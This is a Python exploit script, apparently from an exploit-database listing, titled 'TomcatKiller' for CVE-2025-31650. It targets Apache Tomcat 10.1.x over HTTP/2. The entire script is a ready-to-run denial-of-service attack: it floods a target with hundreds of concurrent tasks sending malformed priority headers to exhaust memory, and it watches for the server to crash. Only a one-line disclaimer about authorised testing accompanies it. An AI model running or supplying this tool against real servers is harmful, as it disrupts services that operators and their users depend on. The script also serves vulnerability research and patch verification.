1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) # Author: Abdualhadi khalifa # CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import init, Fore, Style init() class TomcatKiller: def __init__(self): self.success_count = 0 self.error_count = 0 self.invalid_priorities = [ \\\"u=-1, q=2\\\", \\\"u=4294967295, q=-1\\\", \\\"u=-2147483648, q=1.5\\\", \\\"u=0, q=invalid\\\", \\\"u=1/0, q=NaN\\\", \\\"u=1, q=2, invalid=param\\\", \\\"\\\", \\\"u=1, q=1, u=2\\\", \\\"u=99999999999999999999, q=0\\\", \\\"u=-99999999999999999999, q=0\\\", \\\"u=, q=\\\", \\\"u=1, q=1, malformed\\\", \\\"u=1, q=, invalid\\\", \\\"u=-1, q=4294967295\\\", \\\"u=invalid, q=1\\\", \\\"u=1, q=1, extra=\\\", \\\"u=1, q=1; malformed\\\", \\\"u=1, q=1, =invalid\\\", \\\"u=0, q=0, stream=invalid\\\", \\\"u=1, q=1, priority=recursive\\\", \\\"u=1, q=1, %invalid%\\\", \\\"u=0, q=0, null=0\\\", ] async def validate_url(self, url): try: parsed_url = urllib.parse.urlparse(url) if not parsed_url.scheme or not parsed_url.hostname: raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\") host = parsed_url.hostname port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80) return host, port except Exception: print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\") sys.exit(1) async def check_http2_support(self, host, port): async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: try: response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"}) if response.http_version == \\\"HTTP/2\\\": print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\") return True else: print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\") return False except Exception: print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\") return False async def send_invalid_priority_request(self, host, port, num_requests, task_id): async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: url = f\\\"https://{host}:{port}/\\\" for i in range(num_requests): headers = { \\\"priority\\\": random.choice(self.invalid_priorities), \\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\", \\\"cache-control\\\": \\\"no-cache\\\", \\\"accept\\\": f\\\"*/*; q={random.random()}\\\", } try: await client.get(url, headers=headers) self.success_count += 1 except Exception: self.error_count += 1 async def monitor_server(self, host, port): while True: try: with socket.create_connection((host, port), timeout=2): print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\") except Exception: print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\") break await asyncio.sleep(2) async def run_attack(self, host, port, num_tasks, requests_per_task): print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\") print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\") print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\") monitor_task = asyncio.create_task(self.monitor_server(host, port)) tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] await asyncio.gather(*tasks) monitor_task.cancel() total_requests = num_tasks * requests_per_task success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0 print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\") print(f\\\"Target: {host}:{port}\\\") print(f\\\"Total Requests: {total_requests}\\\") print(f\\\"Successful Requests: {self.success_count}\\\") print(f\\\"Failed Requests: {self.error_count}\\\") print(f\\\"Success Rate: {success_rate:.2f}%\\\") print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\") async def main(): print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\") print(f\\\"Developed by: @absholi7ly\\\") print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\") print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\") url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\") num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300) requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000) tk = TomcatKiller() host, port = await tk.validate_url(url) if not await tk.check_http2_support(host, port): sys.exit(1) await tk.run_attack(host, port, num_tasks, requests_per_task) if __name__ == \\\"__main__\\\": try: asyncio.run(main()) print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\") except KeyboardInterrupt: print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\") sys.exit(0) except Exception as e: print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\") sys.exit(1) |